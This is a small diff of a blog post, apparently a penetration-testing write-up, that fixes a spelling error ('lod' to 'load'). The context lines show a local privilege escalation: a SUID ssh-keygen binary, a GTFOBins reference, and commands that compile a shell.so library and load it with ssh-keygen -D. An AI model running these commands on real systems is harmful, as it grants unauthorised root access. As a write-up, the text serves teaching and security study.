livz/livz.github.io/_posts/2023-11-18-Neat-privesc.md

 $ ls -al `which ssh-keygen`
 -rwsr-xr-x 1 root root 477488 Aug  4 22:02 /usr/bin/ssh-keygen
 ```
 There's an entry on GTFOBins for this<sup>[2](https://gtfobins.github.io/gtfobins/ssh-keygen/)</sup>, which hints at creating a shared library and load it via the `-D` parameter.
 This is the tricky part however.
-If we simply compile the library and try to force `ssh-keygen` to lod it, we get the following error:
+If we simply compile the library and try to force `ssh-keygen` to load it, we get the following error:
 ```bash
 $ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
 $ ssh-keygen -D shell.so